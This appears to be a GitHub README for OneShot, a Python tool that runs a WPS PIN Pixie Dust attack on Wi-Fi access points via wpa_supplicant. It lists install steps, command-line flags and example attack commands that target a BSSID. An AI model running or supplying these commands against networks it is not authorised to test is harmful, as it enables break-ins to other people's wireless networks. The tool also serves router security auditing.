Skip to content
Try a single WPS PIN Pixie Dust attack without monitor mode with wpa_supplicant
Branch: master
Clone or download
Pull request Compare This branch is 29 commits ahead of rofl0r:master.
Type Name Latest commit message Commit time
Failed to load latest commit information.
.gitignore init Oct 13, 2017 Fix bugs; add network scan and suggest feature Sep 1, 2019 Fix a bug Sep 1, 2019
vulnwsc.txt Update vulnerable WSC list Sep 9, 2019


OneShot performs Pixie Dust attack without having to switch to monitor mode.




Installing requirements

sudo apt install -y python3 wpasupplicant iw wget

Installing Pixiewps

Ubuntu 18.04 and above or Debian 10 and above

sudo apt install -y pixiewps

Other versions

sudo apt install -y build-essential unzip
wget && unzip
cd pixiewps*/
sudo make install

Getting OneShot

cd ~

Optional: getting a list of vulnerable to pixie dust devices for highlighting in scan results:


Usage <arguments>
 Required Arguments:
    -i, --interface=<wlan0>  : Name of the interface to use

Optional Arguments:
    -b, --bssid=<mac>        : BSSID of the target AP
    -p, --pin=<wps pin>      : Use the specified pin (arbitrary string or 4/8 digit pin)
    -K, --pixie-dust         : Run Pixie Dust attack
    -F, --force              : Run Pixiewps with --force option (bruteforce full range)
    -X                       : Alway print Pixiewps command
    -v                       : Verbose output

Usage example

Start Pixie Dust attack on a specified BSSID:

sudo python3 -i wlan0 -b 00:90:4C:C1:AC:21 -K

Show avaliable networks and start Pixie Dust attack on a specified network:

sudo python3 -i wlan0 -K


Special Thanks

  • Monohrom for testing, help in catching bugs, some ideas;
  • Wiire for developing Pixiewps.
You can’t perform that action at this time.